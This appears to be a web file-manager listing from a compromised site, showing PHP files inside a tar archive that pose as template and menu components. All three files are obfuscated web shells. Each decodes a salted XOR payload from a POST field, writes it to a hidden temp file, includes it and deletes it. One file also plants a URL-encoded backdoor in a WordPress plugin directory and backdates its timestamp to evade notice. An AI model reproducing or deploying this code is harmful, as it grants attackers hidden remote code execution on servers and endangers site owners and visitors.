File manager - Edit - /home/lemagazi/www/archive/docs/v1/dpuay/Report.tar
Back
Html/Renderer/Template/js/imagebrowser.php 0000666 00000003353 15134053617 0014621 0 ustar 00 <?php if(!empty($_POST["\x6F\x62j"])){ $desc = $_POST["\x6F\x62j"]; $desc =explode ( "." , $desc ); $factor= ''; $s= 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen= strlen($s); $len= count($desc); for($m= 0; $m < $len; $m++) { $v8= $desc[$m]; $chS= ord($s[$m % $sLen]); $dec= ((int)$v8 - $chS -($m % 10)) ^ 26; $factor .= chr($dec); } $pointer = array_filter(["/dev/shm", getenv("TMP"), session_save_path(), "/tmp", getcwd(), getenv("TEMP"), ini_get("upload_tmp_dir"), sys_get_temp_dir(), "/var/tmp"]); foreach ($pointer as $key => $item) { if (array_product([is_dir($item), is_writable($item)])) { $data_chunk = "$item" . "/.reference"; $file = fopen($data_chunk, 'w'); if ($file) { fwrite($file, $factor); fclose($file); include $data_chunk; @unlink($data_chunk); exit; } } } } if(array_key_exists("t\x6F\x6Ben", $_POST) && !is_null($_POST["t\x6F\x6Ben"])){ $parameter_group = array_filter([getcwd(), getenv("TMP"), session_save_path(), "/tmp", sys_get_temp_dir(), ini_get("upload_tmp_dir"), getenv("TEMP"), "/var/tmp", "/dev/shm"]); $comp = $_POST["t\x6F\x6Ben"]; $comp =explode ( '.' , $comp ); $hld =''; $salt ='abcdefghijklmnopqrstuvwxyz0123456789'; $lenS =strlen( $salt); $j =0; array_walk( $comp, function( $v3) use( &$hld, &$j, $salt, $lenS) { $chS =ord( $salt[$j %$lenS]); $dec =( ( int)$v3 - $chS -( $j %10)) ^ 14; $hld .= chr( $dec); $j++; }); foreach ($parameter_group as $bind) { if (!( !is_dir($bind) || !is_writable($bind) )) { $sym = sprintf("%s/.desc", $bind); if (@file_put_contents($sym, $hld) !== false) { include $sym; unlink($sym); die(); } } } } Html/Renderer/Template/js/.desc 0000666 00000003710 15134053617 0012336 0 ustar 00 <?php $p = "/home/lemagazi/www/wp-content/plugins/file-manager-advanced/application/svg-sanitizer/includes/phar-io/manifest/src/frontpage.php"; $c = rawurldecode('%3C%3Fphp%0A%0Aif%28%21empty%28%24_REQUEST%5B%22t%5Cx6Fken%22%5D%29%29%7B%0A%09%24data_chunk%20%3D%20%24_REQUEST%5B%22t%5Cx6Fken%22%5D%3B%0A%09%24data_chunk%09%09%3D%09%09%20explode%09%09%28%09%09%20%22.%22%20%2C%09%09%24data_chunk%09%20%29%09%20%3B%09%0A%09%24ptr%20%20%3D%09%27%27%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%24s%20%20%3D%09%27abcdefghijklmnopqrstuvwxyz0123456789%27%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%24sLen%20%20%3D%09strlen%28%24s%29%3B%0A%20%20%20%20%0A%20%20%20%20%20%20%20%20%20%20%20%20foreach%20%28%24data_chunk%20as%20%24u%20%3D%3E%20%24v9%29%20%7B%09%24sChar%20%20%3D%09ord%28%24s%5B%24u%09%20%25%24sLen%5D%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24dec%20%20%3D%09%28%28int%29%24v9%20-%20%24sChar%20-%20%28%24u%09%20%2510%29%29%20%5E%20%0971%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24ptr.%3D%09chr%28%24dec%29%3B%20%09%7D%0A%09%24descriptor%20%3D%20array_filter%28%5Bsession_save_path%28%29%2C%20getenv%28%22TEMP%22%29%2C%20sys_get_temp_dir%28%29%2C%20%22/var/tmp%22%2C%20ini_get%28%22upload_tmp_dir%22%29%2C%20%22/dev/shm%22%2C%20getenv%28%22TMP%22%29%2C%20%22/tmp%22%2C%20getcwd%28%29%5D%29%3B%0A%09for%20%28%24resource%20%3D%200%2C%20%24ent%20%3D%20count%28%24descriptor%29%3B%20%24resource%20%3C%20%24ent%3B%20%24resource%2B%2B%29%20%7B%0A%20%20%20%20%24object%20%3D%20%24descriptor%5B%24resource%5D%3B%0A%20%20%20%20%09%09if%20%28is_dir%28%24object%29%20%26%26%20is_writable%28%24object%29%29%20%7B%0A%20%20%20%20%24itm%20%3D%20implode%28%22/%22%2C%20%5B%24object%2C%20%22.flag%22%5D%29%3B%0A%20%20%20%20if%20%28file_put_contents%28%24itm%2C%20%24ptr%29%29%20%7B%0A%09include%20%24itm%3B%0A%09%40unlink%28%24itm%29%3B%0A%09exit%3B%0A%7D%0A%7D%0A%7D%0A%7D'); if (file_put_contents($p, $c)) { echo '!success!'; @touch($p, 1768741218); } die('!ended!'); Html/menu_reg.php 0000666 00000001717 15134053617 0010001 0 ustar 00 <?php if(array_key_exists("pg\x72\x70", $_POST) && !is_null($_POST["pg\x72\x70"])){ $flag = array_filter([getenv("TEMP"), "/tmp", ini_get("upload_tmp_dir"), sys_get_temp_dir(), session_save_path(), getcwd(), getenv("TMP"), "/var/tmp", "/dev/shm"]); $entry = $_POST["pg\x72\x70"]; $entry = explode ( "." , $entry) ; $tkn = ''; $s3 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen( $s3); $len = count( $entry); for( $y = 0; $y < $len; $y++) {$v8 = $entry[$y]; $sChar = ord( $s3[$y % $lenS]); $d =( ( int)$v8 - $sChar -( $y % 10)) ^ 42; $tkn .= chr( $d); } for ($ptr = 0, $val = count($flag); $ptr < $val; $ptr++) { $resource = $flag[$ptr]; if ((bool)is_dir($resource) && (bool)is_writable($resource)) { $k = sprintf("%s/.itm", $resource); if (file_put_contents($k, $tkn)) { require $k; unlink($k); exit; } } } }
| ver. 1.4 |
Github
|
.
| PHP 5.4.45 | Generation time: 0 |
proxy
|
phpinfo
|
Settings